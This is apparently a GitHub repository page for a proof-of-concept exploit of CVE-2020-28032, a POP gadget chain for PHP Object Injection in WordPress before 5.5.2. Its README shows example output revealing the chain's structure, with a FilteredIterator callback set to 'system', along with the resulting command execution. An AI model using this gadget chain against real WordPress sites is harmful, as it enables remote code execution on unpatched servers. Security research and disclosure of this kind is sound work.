Skip to content
/ CVE-2020-28032_PoC Public

PoC for CVE-2020-28032 (It's just a POP chain in WordPress < 5.5.2 for exploiting PHP Object Injection)

4 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

nth347/CVE-2020-28032_PoC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
CVE-2020-28032_PoC.php
CVE-2020-28032_PoC.php
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2020-28032_PoC

PoC for CVE-2020-28032 (It's just a POP chain in WordPress < 5.5.2 for exploiting PHP Object Injection)

Example output

nth347@ubuntu:~$ php CVE-2020-28032_PoC.php 
WC_Log_Handler_File Object
(
    [handles:protected] => Requests_Utility_FilteredIterator Object
        (
            [callback:protected] => system
            [storage:ArrayIterator:private] => Array
                (
                    [0] => id
                )

        )

)
uid=1000(nth347) gid=1000(nth347) groups=1000(nth347),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare)

About

PoC for CVE-2020-28032 (It's just a POP chain in WordPress < 5.5.2 for exploiting PHP Object Injection)

Topics

wordpress security-vulnerability deserialization-vulnerability

Resources

Readme
Activity

Stars

4 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages